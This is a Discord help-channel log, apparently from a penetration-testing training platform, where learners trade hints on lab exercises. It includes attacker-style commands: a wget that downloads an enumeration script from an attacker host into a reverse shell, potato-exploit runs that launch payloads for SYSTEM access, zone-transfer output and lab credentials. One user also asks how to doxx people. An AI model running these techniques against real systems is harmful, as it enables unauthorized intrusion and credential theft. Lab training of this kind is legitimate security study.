or do you just want the solution ?

rustic sage
#

not at all, but i just cant connect to both

keen compass
#

I can give it but I don't think it's a good way to learn

#

really ?

rustic sage
#

now im just looking over at what i missed

keen compass
#

mysql

#

try again

rustic sage
#

i will give it another try

#

nvm im stupid, i tried mysql before but forgot the -p<password>..........

keen compass
#

you are not stupid, just always double check what you are doing, and test locally if not sure about something

#

spending 2 more minutes verifying you typed something properly permit you to avoid having to try it again later and doubt about yourself, so thoses 2 minutes makes you earn a lot of time at the end

rustic sage
#

true

cursive zinc
#

i need some help for this

#

i have found the user name and the password but when I'm writting the password to get acces of the ssh server , i have permission denied

rustic sage
keen compass
zinc marsh
#

@misty current u there?

steady hawk
zinc marsh
#

but i cannot access anywhere

steady hawk
#

Are you sure?

zinc marsh
steady hawk
#

If you are absolutely sure you've tried everything you can dm if you'd like

fathom pendant
cursive zinc
#

Thank for thé response I have already solve the problem

fathom pendant
#

Kk :)

opal storm
#

any reason why the activedirectory module isnt installed for the security assessment portion of Active Directory Enumeration and Attacks? i figured its a little "stealthier" to use that instead of loading powerview onto a machine? just my thought

zinc marsh
opal storm
#

yes

zinc marsh
#

because there isnt active directory in that ip

opal storm
#

i guess but if im able to upload powerview and query AD for information, why not use the AD powershell module?

sweet lava
#

Hey guys, I'm having trouble uploading ||Lazagne ||to the machine in Credential Hunting in Linux. I have access to Kira, just need to run ||Lazagne ||as that seems to be the key. Transferred the .||py||, but keep getting "no module found" when I run it. Any tips?

steady hawk
sweet lava
steady hawk
#

Yes, it includes the dependencies for .py

zinc marsh
foggy light
#

Module: Using CrackMapExec
Section: Skill Assessment
Question: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.

From Question 1 I found user J***
Then kerberoast with that user and found A***. With the new user I did found access to anything. Then I check for mssql, check msdb database, didnt find anything interesting.

Can someone point me in a direction?

proud pine
opal storm
proud pine
#

In the sample report, in the 'documentation and reporting' module, there's a finding where they mention that the tester was 'noisy', but undetected. They use this as a finding to suggest that they invest in monitoring tools for the network.

opal storm
foggy light
acoustic owl
acoustic owl
#

If you have completed the module 100%, then yes.

kind turret
#

And you will get to see any updates if there are any.

acoustic owl
blazing crypt
#

Windows Privilege Escalation

Credential Hunting

Search the file system for a file containing a password. Submit the password as your answer.

I've found like 5 passwords, but none seem to work 😅 Any hint?

acoustic owl
blazing crypt
acoustic owl
narrow solar
#

any help here please, i spent 2 days 😅

kind fern
#

Hi, can anyone help me to solve "Password Attacks Lab - Medium
" how to find the dennis password?

acoustic owl
#

Allways bake a || lazagne ||

acoustic owl
misty current
#

Where is it stating in the repository?

SPOILER_image.png
blazing crypt
acoustic owl
#

Try ist with the user htb-student

blazing crypt
blazing crypt
misty current
acoustic owl
misty current
#

I'm just wondering, if I'm the only one who couldn't find the information for each technique in the UACMe.

#

Ah, I found it. Nvm

blazing crypt
misty current
#

You're trying Lazagne from an elevated shell right?

misty current
blazing crypt
acoustic owl
blazing crypt
acoustic owl
deep owl
#

hello all please help if you can ... i don't want to skip the section as am stuck for 3 days

#

module : ACTIVE DIRECTORY ENUMERATION & ATTACKS

#

section: Kerberoasting - from Linux

misty current
#

What's your issue?

deep owl
#

when running the kerboroating attack

#

it asks for a password

#

from the module it says that you would have the password of a domain user

#

but it seems that the user am connected to is not part of the domain

#

so when i try the password given to me which is HTB_@cademy_stdnt! it does not work

misty current
#

One tip for AD Enum and attacks module, keep track of the creds you get from each section, cuz they get re-used in later section without any heads-up.

deep owl
#

thank you so much ... i started this module without taking any notes and it seems like i have to redo it all over again

pine dagger
#

I also wasn't taking notes through doing HTB, and I really regret it now. Its really a good idea to take notes though, even if you never use them again, as it helps cement knowledge, etc. And if you do use them again, its easy to come back to.

#

Its also super important if you ever need to demonstrate how you did it to a customer (if you're doing pen testing, etc)

kind fern
foggy light
rustic sage
rapid sparrow
#

I need some help with Connect via RDP with the Administrator account and submit the flag.txt as you answer. in the module ATTACKING COMMON SERVICES - attacking RDP

#

I cannot get the hash of administrator acc

rustic sage
#

Does anyone knows when some module is on continues when my plan expires can i still continue the module or it will lock

fathom pendant
#

The only modules you keep when silver annual or student expire or run out are the ones you completed

misty current
#

I'm guessing target spawns are only under active subs?

fathom pendant
#

If you own the module you can spawn the target

#

I am not under any subscription, just purchased cubes and went from there. Any module I've purchased I can go back and redo as much as I want

#

I'm assuming it's the same if youve completed it

#

But I know for sure you get to keep the modules you completed under those specific subs

misty current
#

Ah, infinite lab access. Niceh PizzaGoose

fathom pendant
#

Would be kinda dumb if you purchased something and couldn't go back to it when you completed it

misty current
#

True, it's just the labs i've seen so far in other platforms/orgs, they don't just give it to you forever. It's always on a sub.

fathom pendant
#

(I was mostly talking shit about those orgs)

misty current
#

Heh

acoustic owl
charred juniper
carmine lark
#

Predictable Reset Token - from Broken authentication
question 1

Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

can anyone help me with this question, I've finished the module but stuck on this question.

I've read the php file that explains that they use the time and convert to md5 hash.
I've altered the given.py file to hash any micro time 2s before and after the given time from target however i've not landed a hit and tried multiple different option but to no avail

zenith tulip
#

Hello, I need help with this module https://academy.hackthebox.com/module/39/section/404 I did the whole step by step but when I run it, the following error appears:

Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

I don't know what could be wrong I just started on htb

Question:

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

velvet leaf
#

@charred juniper see below for more details

Slowly I am making progress on the academy.
Now I am at: academy.hackthebox.com module 77 section 853

About: Nibbles - Privilege Escalation

I have reached the point where I have setup a reverse shell and want to download the LinEnum.sh script inside the machine. The reverse shell also was a search to upgrade it but I managed. I have setup a python http.server on the ParrotOS Linux environment. It seems the wget command sees the file but it won’t download. I even tried with base64 to get the script over but unsuccessfully.

See my terminal output below:

nibbler@Nibbles:/tmp$ wget http://10.10.15.57/LinEnum.sh -O /tmp/LinEnum.test
–2023-06-10 12:15:39–
Connecting to 10.10.15.57:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘/tmp/LinEnum.test’

/tmp/LinEnum.test 0%[ ] 0 --.-KB/s in 15m 0s

2023-06-10 12:30:40 (0.00 B/s) - Read error at byte 0/46631 (Connection timed out). Retrying.

–2023-06-10 12:30:41-- (try: 2)
Connecting to 10.10.15.57:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘/tmp/LinEnum.test’

/tmp/LinEnum.test 0%[ ] 0 --.-KB/s

Currently I am setting up a Kali Linux box to see if it will work with another distribution.
In Kali Linux I am unable to upgrade the TTY.
I reach the step to reset the terminal but it wont allow me to do that.

Has anyone come across these issues? And were you able to resolve it? Can you share with me how to resolve this?

brittle umbra
#

In the shells & payloads module (the live engagement), can someone tell me which Metasploit module works on the 3rd host?

vagrant gust
#

how do i access the files in the attack box with xfreerdp

misty current
vagrant gust
#

and i see one that looks like the drive

#

but when i use the credentials saved on the attack box it says incorrect password

zinc marsh
vagrant gust
#

mounting the folder worked for me

vital adder
#

this isn't the place for that, if you are new here pls read #rules and #welcome this channel is for hackthebox academy modules

#

although i do recommended CBT Nuggets for that

carmine lark
#

Can anyone assist with Predictable Reset Token - from Broken authentication
question 1 .
I take htbadmin<timestamp in millisecond>, convert to md5 hash and run 1500 milliseconds before and after timestamp testind out every hash, however i've not gotten flag yet. can anyone please assist? this is the last thing i need to finish the module

zinc marsh
#

can i still poison the network with this error?

# 

[+] Listening for events...```
misty current
#

It'll still poison other services.

#

except for RDP I guess

#

You'd have to turn off RDP, if you want to poison that too.

#

(most of the time, that's unnecessary)

zinc marsh
#

good to know

gusty gust
#

Heya. I recently started the Pentester Path.
In the "Getting Started" module I have some really strange behaviours.
First I wasn't able to get the initial foothold in the Nibbles Lab by uploading the php-file as I was getting connection timeouts when I sent the POST request.
After it still didn't work after resetting and trying it in incognito mode I went onward to the "Knowledge Check" Section.
Trying to upload the teXXXXX in the thXXX-XXXX.XXX I also get a timeout.
Using the HTB-PWNbox and uploading it makes the page unresponsive and I had to reset the machine...

Navigating the admin section works as intended so I think the connection by itself is working.

image.png
blazing crypt
#

Windows Privilege Escalation

Miscellaneous Techniques

Using the techniques in this section, find the cleartext password for an account on the target host.

I got administrator access, dumped the SAM, cracked the hashes, yet the plaintext password doesn't work...

blazing crypt
zinc marsh
#

any hint ?

acoustic owl
open spruce
#

Hi, I'm a little bit lost with this:
Linux fund. 'Task Scheduling'
What is the type of the service of the "syslog.service"?

naive wadi
#

Having issues with this question " What is the last mailserver returned when querying the MX records for githubapp.com? " in Information Gathering - Web -Skills Assessment.

#

sitting with a list of MX records from ||virus total|| and it won't accept any of them

proven peak
zinc marsh
rustic sage
#

Question on the DNS module (https://academy.hackthebox.com/module/144/section/1256). Trying to list DNS zones and records and then there's a question for a TXT record, but my dig query to the name server doesn't yield any txt records.

||`└─$ dig @inlanefreight.htb inlanefreight.htb txt

; <<>> DiG 9.18.12-1-Debian <<>> @inlanefreight.htb inlanefreight.htb txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12098
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 46cb81ebd7e9acd201000000648624c5ed5c62afb84d5519 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN TXT

;; AUTHORITY SECTION:
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800

;; Query time: 20 msec
;; SERVER: 10.129.165.192#53(inlanefreight.htb) (UDP)
;; WHEN: Sun Jun 11 19:47:17 UTC 2023
;; MSG SIZE rcvd: 115||`

HTB Academy : Cybersecurity Training

Login to HTB Academy and continue levelling up your cybsersecurity skills.

oblique bridge
#

HI

carmine lark
#

@rustic sage try doing an AXFR zone transfer. that should give any and all dns information

rustic sage
# carmine lark <@456226577798135808> try doing an AXFR zone transfer. that should give any and ...

Did that before, but I'm none the wiser from there:

||`└─$ dig @inlanefreight.htb inlanefreight.htb axfr

; <<>> DiG 9.18.12-1-Debian <<>> @inlanefreight.htb inlanefreight.htb axfr
; (1 server found)
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
admin.inlanefreight.htb. 604800 IN A 10.10.34.2
ftp.admin.inlanefreight.htb. 604800 IN A 10.10.34.2
careers.inlanefreight.htb. 604800 IN A 10.10.34.50
dc1.inlanefreight.htb. 604800 IN A 10.10.34.16
dc2.inlanefreight.htb. 604800 IN A 10.10.34.11
internal.inlanefreight.htb. 604800 IN A 127.0.0.1
admin.internal.inlanefreight.htb. 604800 IN A 10.10.1.11
wsus.internal.inlanefreight.htb. 604800 IN A 10.10.1.240
ir.inlanefreight.htb. 604800 IN A 10.10.45.5
dev.ir.inlanefreight.htb. 604800 IN A 10.10.45.6
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
resources.inlanefreight.htb. 604800 IN A 10.10.34.100
securemessaging.inlanefreight.htb. 604800 IN A 10.10.34.52
test1.inlanefreight.htb. 604800 IN A 10.10.34.101
us.inlanefreight.htb. 604800 IN A 10.10.200.5
cluster14.us.inlanefreight.htb. 604800 IN A 10.10.200.14
messagecenter.us.inlanefreight.htb. 604800 IN A 10.10.200.10
ww02.inlanefreight.htb. 604800 IN A 10.10.34.112
www1.inlanefreight.htb. 604800 IN A 10.10.34.111
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 16 msec
;; SERVER: 10.129.165.192#53(inlanefreight.htb) (TCP)
;; WHEN: Sun Jun 11 19:59:24 UTC 2023
;; XFR size: 22 records (messages 1, bytes 594)`||

carmine lark
#

use nslookup

rustic sage
# carmine lark use nslookup

ah. i think i now got it even with dig. My (false) thought was that there are two zones in DNS because I was getting two SOA records when doing the zone transfor for the main domain. but i was wrong. should have instead queried all the subdomains I found and then I find a second subdomain that is its own zone (i.e., i can do a zone transfer from it) and that one then indeed has a TXT record.

Thanks for pushing me 😉

carmine lark
#

nicely done

pine dagger
zinc marsh
pine dagger
#

Huh?

#

Why would you do that?

zinc marsh
#

b* ||is member of ITmanagers||

pine dagger
#

Just ||enumerate the shares using a tool using the credentials you have||.

zinc marsh
#

why with smbclient it was working?

pine dagger
#

When enumerating SMB shares, you're meant to be looking for which shares the account you are using has access to. Then you should examine the shares using a tool to find out what's in the shares you can access. While you can use smbclient, there's another tool that's particularly good at identifying all the files available in shares.

zinc marsh
#

yea i did it with smbmap

#

but i got it work with smbclient i must be too tired

misty current
#

difference with smbmap from smbclient is, it tells you what permissions you have to the share.

pine dagger
# zinc marsh but i got it work with smbclient i must be too tired

Take a break from the computer for a bit. Do something else, like take a shower, watch an episodes of a TV show or something. It's something that I find does help me at times when I'm just bashing my face into the brick wall. I'll come back and sometimes solve it in 5 minutes.

#

Its very easy to get focussed on the mindset that you should be able to solve this if you just did that one thing different.

fathom pendant
rustic sage
kind fern
#

In "Password Attacks Lab - Hard
" I found johannas password and connected via xfreerdp, so what is the next step should I do?

fathom pendant
#

Look around

#

Perhaps there's a key somewhere you need to pass

zinc marsh
#

with --shares

zinc marsh
#

the permisssions are good at least

pine dagger
#

SELECT * FROM TakeABReak;

#

😄

zinc marsh
#

i need to finish it today to do topology machine tomorrow

pine dagger
#

topology machine?

zinc marsh
pine dagger
#

What's that?

#

A box?

opal storm
#

for security assessment 1 of active directory enumeration and attacks, to get the second users password, i know there are many ways of doing this but the module mentions its somewhere in plaintext. i can keep trying to manually find it but should one of the tools mentioned in the previous sections about share enumeration find this password?

naive wadi
#

I have the MX records from virus total but they are not being accepted

pine dagger
opal storm
pine dagger
#

I used the powershell method

opal storm
#

what does that mean? manually? with powerview?

pine dagger
#

Manually.

opal storm
#

ok, ill keep poking around that machine then

#

ive checked a good amount of locations but no luck yet lol

pine dagger
#

Oh sorry. I think from my notes, I used mimikatz 🙂

#

They were a little confusing

opal storm
#

ohhh

#

i see

#

its not sitting somewhere in plaintext lol

pine dagger
#

Yes. 🙂

#

I used ||mimikatz in powershell via meterpreter||.

#

And sadly @naive wadi, I don't have any notes for that so I can't help you 😦

kind fern
opal storm
fathom pendant
rustic sage
#

bro

#

anybody here

carmine hill
#

Just finished the “deserialization attacks” module. If someone needs help, you can dm me

covert bloom
#

whats a good way to doxx people

kind fern
rare robin
zinc marsh
zinc marsh
rare robin
#

FUCKCKCKCKC

#

WHYY

kind fern
zinc marsh
#

just in case

rare robin
#

its the top gggg

zinc marsh
kind fern
opal storm
#

are we supposed to do port forwarding in order to get the password of the second user in the security assessment part 1 - active directory enumeration and attacks?

zinc marsh
#

just open it lol

zinc marsh
kind fern
# zinc marsh and what is the doubt

I found a file with .kdbx extention, I cracked with john, in there I found the password for d*** user but it's not work, what should I do?

zinc marsh
opal storm
zinc marsh
opal storm
urban sage
opal storm
#

ill take a look at that one, ive only used chisel before but i assume they accomplish the same thing

zinc marsh
zinc marsh
#

i havent opened it, not sure what is inside

zinc marsh
urban sage
zinc marsh
opal storm
urban sage
zinc marsh
#

rat showed it to me yesterday lol

rustic sage
#

for web shell and shell and also a privilage escalation

#

any tool's or a tips ?

zinc marsh
# 
.\juicypotato -l 9898 -p shell.bat -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 9898
COM -> recv failed with error: 10038```
#

what is this error?

#

one guy told this UPDATE - The command above does work now, it turns out I had the wrong CLSID. Furthermore, with the shell.bat, I am now NT AUTHORITY\SYSTEM, and I finally got the flag.

kind fern
opal storm
# zinc marsh if u have any doubt about the tool ask me

am i understanding this wrong? if we need to port forward the connection from the second machine through the initial machine back to our attack box, dont we need 2 connections on the initial box in order to 1) port forward and 2) get a connection from the second machine onto the first ?

zinc marsh
zinc marsh
#

u just need to do the port forward to ur target machine

#

there are 3 machines

#

attacker | pivot | AD

opal storm
#

right

#

but dont we need to get at least a reverse shell or something on the second machine in order to do the next step?

zinc marsh
#

u got the t*y credentials without pivoting?

opal storm
#

no

#

thats what im trying to do now

#

and we need to run a certain tool on that machine in order to get the creds is my thought process

zinc marsh
#

u doing all in the webshell?

opal storm
#

no lol i have a meterpreter shell on the first machine/web server

zinc marsh
#

then u just have to do port forwarding

#

from that machine to ur attacker

opal storm
#

i guess im confused on how that wil allow us to access the second machine?

#

to get tp**y creds

zinc marsh
#

dont u have the creds for ||svc_sql?||

lyric echo
#

Hey yall! Im working on the HTTPs / TLS module, but I consistently encounter this error when trying to access the lab URL. Could someone please help?

image.png
opal storm
#

which im using now to access the machine

zinc marsh
lyric echo
# zinc marsh try https://

😖 Thanks! That worked and I also realized why I wasnt able to see the HSTS header. Thanks @zinc marsh !

edgy osprey
#

Hi folks! Would anyone be able to help me figure out the “other flag” in the ping exercise (Using Web Proxies)? I’ve gotten the first flag easily by using ‘cat flag.txt’, but when looking at the other files listed nothing is a text file that can be viewed. I’ve tried changing directories through ‘cd ..’ but nothing stands out. I’ve used the following as well to look at all of the files and still nothing stood out:
‘ls -R /var/www/html;’
Im completely at a loss for what else to look at. It was interesting the number of files I could see but nothing “said” second flag to me…
Thanks in advance for any guidance.

zinc marsh
# 
.\roguepotato.exe -r 172.16.7.240 -e "C:\Users\Public\Downloads\shell.exe"
[+] Starting RoguePotato...
[!] RogueOxidResolver not run locally. Ensure you run it on your remote machine
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] IStoragetrigger written:106 bytes
[-] Named pipe didn't received any connect request. Exiting ...```
#

someone could help me

balmy saffron
#

hello, I am at attack common services SQL. I cannot connect on the MSSQL server using these commands:
sqsh -S 10.129.74.205 -U htbdbuser -P 'MSSQLAccess01!'
or
sqsh -S 10.129.74.205 -U .\htbdbuser -P 'MSSQLAccess01!'
What am I doing wrong?

#

I did 2 backslashes. Discord removed one.

plain coral
#

What’s the issue?

winged shore
#

I'm stuck in the "WordPress - Discovery & Enumeration" section of the "Attacking Common Applications" module. I actually enumerated the site and found the hidden plugin, however I cannot seem to find the version number. It's not in the source code and I cannot find the readme.txt which the hint alludes to. Can someone nudge me in the right direction?

Edit: as the prophecy foretells, I found the answer right after posting as I'd been looking for an hour 🙂

urban sage
#

Nice job! Glad you figured it out!

rapid sparrow
#

Anyone could help me

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

Attacking DNS

acoustic owl
bright solar
#

Hey all, for Broken Authentication - Brute Forcing Cookies, Question 2. I just want to confirm if I am looking at the correct cookie to work on. Currently I get the following within my proxy: 'Cookie: PHPSESSID=op5tvfbvhfu3k806kniubpvsvu'. From other posts though, it appears there is a cookie with HTB in the name, but that does not appear for me. If someone can confirm it would be greatly appreciated it!

foggy light
#

This was a beast!!!

image.png
karmic wren
#

Attack Active Directory &ntds.dit. In password attack module. Finding John username and password world rustome wordlist. ??? Any hint to reduce the time.

rustic sage
acoustic owl
acoustic owl
acoustic owl
#

Are you at this question?
Submit the contents of the C:\flag.txt file on MS01.

or at this?
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

tawny zealot
#

the latter one, the Administrator's flag

acoustic owl
#

okay, then ||mimikatz on SQL01|| is your friend

#

You should find a Password in Cleartext

pine dagger
pine dagger
acoustic owl
left wren
#

hi

tawny zealot
#

The most likely reason is that I am just doing something completely wrong trying to pass the hash

acoustic owl
#

This Hash should also work

#

You should be able to log in with it.

robust garden
#

Hi folks. I was wandering if there is someone to help me. I’m stuck in one of those questions from Basic toolset

acoustic owl
tawny zealot
#

Thank you @acoustic owl and @pine dagger !! I finally got it, my mistake was to write the domain into the user parameter of winrm...so mssqlsvc instead of inlanefreight\mssqlsvc and it finally worked 🙂

robust garden
#

The section is bypass security measures- firewall and IDS/IPS Evasion- easy lab . Question is our clue wants to know if we can identify which operating system their machine is running on. Submit the OS name as answer.

kind fern
acoustic owl
kind fern
#

it's .vhd file I do not know how to crack it?

autumn pilot
#

I'm pretty sure, there is an explanation on how to do so

#

in a section on Academy

opal jewel
#

There is an entire article on mounting vhd via linux. Quite simple 😁

acoustic owl
opal jewel
#

Worked like a charm for me

#

That looks to be the same article.

kind fern
#

Thanks a lot it was easy 😆 damn

opal jewel
#

But yes, you can always spin up a windows vm and done👀

kind fern
#

I appreciate it. Thanks a lot.

mossy epoch
rose furnace
#

hello

#

For some reason when i try completing this task Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

it keeps saying tree connect failed NT_status_bad_network_name whenever i try to login

rustic sage
rustic sage
#

Solved

frigid patrol
#

Get started module, service scanning section + 1 Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? , what is the answer i think Apache Tomcat/9.0.31 (Ubuntu), or 9.0.31 or Tomcat/9.0.31

#

i'm stuck, can you help me 😄

edgy osprey
#

Hey @acoustic owl - wondering if you might be able to nudge me in the right direction? I’m on the Repeating Requests module under the web proxy section and stuck on trying to find another flag. I was able to use recursive flag to find all of the directories under /var- however didn’t see any other flag…

west night
#

I find that for some reason the questions are not worded logically in the DNS section in the footprinting module, Especially the first question. Just don't get it!

tawny zealot
buoyant escarp
silk glade
#

Hi all,i am currently on Attacking Common Services - Easy lab,i got the flag. But it says there are 2 ways to get it,can someone help me to get other method?

acoustic owl
acoustic owl
cinder mortar
#

For report writing for the exam, are we expected to record down EVERY finding even if it leads to a dead end, or just every finding that contributes to the attack path will suffice?

west night
#

@acoustic owl It says to "Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain." From the commands given in the module I am not sure how to do that. You typically require both an ip address and an FQDN in order to perform the dig command.

gaunt monolith
#

Hi I need help on Shell & Payloads module in live engagement section , actually when enumerating target I have Tomcat service on port 8080 I need exploit it using msfvenom ,I was created war file but I don’t have any Idea to deliver my file because I don’t have a browser to interact with me , so I think I can when using msfconsole after Im searching I use exploits multi/handler but its doesn’t work 😕 any hint or I’m in wrong rode

zinc marsh
west night
#

@acoustic owl I just keep getting the SOA section which shows the root servers but this is not the correct answer and does not result in finding the "inlanefreight.htb" domain. The question is ambiguous and vague, It does not matter how many times I read the question or the module content for guidance. I am just unsure how to approach this question. Thanks for your assistance 🙂

edgy osprey
#

I’ve also used the search function when I ls -R /var/www/html to see if there is any other file by the same name but no luck

#

Thanks for the tip @tawny zealot ! I’m new to this field, maybe I’m just doing something wrong.

tawny zealot
acoustic owl
acoustic owl
edgy osprey
worldly stump
#

Hello guys, sorry for the question and i do not know is someone else already made the question, by any chance any of you guys have any kind of learning path to follow to be able to follow the fundamentals modules in their respective order, i want to help my brother to start from scratch but to be honest in my case i followed the modules randomly and i do not ahve idea where we can start fro, jsut the fundamentals modules, we will really appreciate any insights about it

west night
#

@acoustic owl Have I understood FQDN correctly? After reading the module material many times, this is what I think an FQDN is:
[hostname].[subdomain].[domain].[topleveldomain].
my gut reaction to "Searched is the FQDN of the NameServer" is that I should try .com instead of htb and see if this changes the output.

acoustic owl
#

No, you don't have to do anything with com.
Only htb

#

https://en.m.wikipedia.org/wiki/Fully_qualified_domain_name

Fully qualified domain name

A fully qualified domain name (FQDN), sometimes also referred to as an absolute domain name, is a domain name that specifies its exact location in the tree hierarchy of the Domain Name System (DNS). It specifies all domain levels, including the top-level domain and the root zone. A fully qualified domain name is distinguished by its lack of ambi...

acoustic owl
worldly stump
#

@acoustic owl wonderful, thanks! much appreciated!

tawny zealot
gaunt monolith
tawny zealot
gaunt monolith
#

I think if I can use curl or wget but still doesn’t work

tawny zealot
gaunt monolith
#

Ya Im in RDP but I cant show where is browser

edgy osprey
tawny zealot
gaunt monolith
naive field
#

can i get some help on AD assement part 1, i've rdped to ms01 host and got the flag. now im kinda lost on how to find this cleartext password. i tried looking manually and then ran winPEAS but nothing....

zinc marsh
#

I have the hash but im not able to pass the hash or crack it

#

i got the credentials for the next questions not the flag for that one

supple patio
#

just type firefox in terminal

analog dock
#

Question 2 in the live engagement, shells & payloads module, I managed to get a webshell but for some reason most commands are not working

#

Whoami and hostname works, but I can’t ls/dir or anything

zinc marsh
#

it is not interactive shell then

misty current
#

It shows the same for dir?

#

if it's getting executed in cmd, ls won't work.

analog dock
misty current
#

what web-shell you using?

#

try with simple php one liner

analog dock
#

The one from laudanum

#

Needed to be a war file

zinc marsh
misty current
#

Just see if war webshells from other repo work.

real compass
# cursive zinc Which however does not work

Hey did you end up figuring out whats wrong cos ive tried literally eveything on this exact problem in this module, legit been stuck on it for like the 3 hours and got absolutely no where. I cracked the initial one but cant seem to get the password for Skills Assement 1 on Login Brute Forcing.
@cursive zinc